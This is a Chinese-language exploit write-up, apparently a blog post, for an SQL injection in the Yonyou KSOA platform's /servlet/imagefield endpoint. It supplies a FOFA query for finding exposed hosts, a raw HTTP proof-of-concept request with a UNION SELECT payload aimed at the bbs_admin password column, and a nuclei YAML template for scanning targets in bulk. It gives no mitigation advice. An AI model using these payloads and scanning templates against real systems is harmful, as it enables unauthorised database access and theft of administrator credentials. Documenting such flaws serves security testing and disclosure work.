漏洞简介
用友时空KSOA平台 /servlet/imagefield 存在SQL注入漏洞,攻击者可利用该漏洞获取数据库敏感信息。
漏洞复现
fofa查询:app="用友-时空KSOA"
登录页面如下:
POC:
GET /servlet/imagefield?key=readimage&sImgname=password&sTablename=bbs_admin&sKeyname=id&sKeyvalue=-1'+union+select+sys.fn_varbintohexstr(hashbytes('md5','test'))--+ HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36
Connection: close
nuclei批量yaml文件
id: yonyouKOSA_imagefield_sqli
info:
name: 用友时空KSOA平台 /servlet/imagefield 存在SQL注入漏洞,攻击者可利用该漏洞获取数据库敏感信息。
author: mhb17
severity: critical
description: description
reference:
- https://
tags: tags
requests:
- raw:
- |+
GET /servlet/imagefield?key=readimage&sImgname=password&sTablename=bbs_admin&sKeyname=id&sKeyvalue=-1'+union+select+sys.fn_varbintohexstr(hashbytes('md5','test'))--+ HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36
Connection: close
matchers-condition: and
matchers:
- type: word
part: body
words:
- '0x098f6bcd4621d373cade4e832627b4f6'
- type: word
part: header
words:
- '200'
标签:漏洞,KSOA,用友,SQL,servlet,imagefield
From: https://www.cnblogs.com/pursue-security/p/17684767.html